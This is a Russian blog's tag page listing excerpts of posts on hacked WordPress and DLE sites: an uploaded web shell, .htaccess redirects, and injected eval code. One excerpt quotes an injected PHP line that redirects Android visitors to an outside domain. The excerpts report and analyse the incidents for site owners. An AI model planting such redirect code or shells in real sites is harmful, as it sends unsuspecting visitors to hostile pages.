Тег: шелл
Как ломают сайты на Вордпресс
Четверг, 20 Фев 2014 11:36 комментария 4Всем привет! Как и обещал, сегодня логическое продолжение истории про взлом сайта на движке Вордпресс. В тот раз неизвестный хакер или хакеры взломали сайт под управлением CMS WordPress, и залили на него шелл, благодаря чему был получен доступ ко всем остальным сайтам на сервере, и в файлах дополнительной конфигурации .htaccess была прописана переадресация на посторонние […]
Как ломали сайты на DLE
Воскресенье, 10 Фев 2013 5:12 комментариев 45Начало. Уязвимость в сайтах на движке Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать:)), но и eval. Но и за первую версию также есть случаи, которые говорят следующее. В файлах движка цмс dle появляется совсем другой код, например, такой: if(stripos($_SERVER[‘HTTP_USER_AGENT’],»Android»)!==false) {header(‘Location: http://refresh-browser.00xff.net/’);exit;} Как видим, домен здесь совсем […]
Уязвимость в сайтах на движке dle
Суббота, 09 Фев 2013 23:08 комментариев 39Как ломали сайты на популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев, естественно без их ведома, прописывался вредоносный код. Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как […]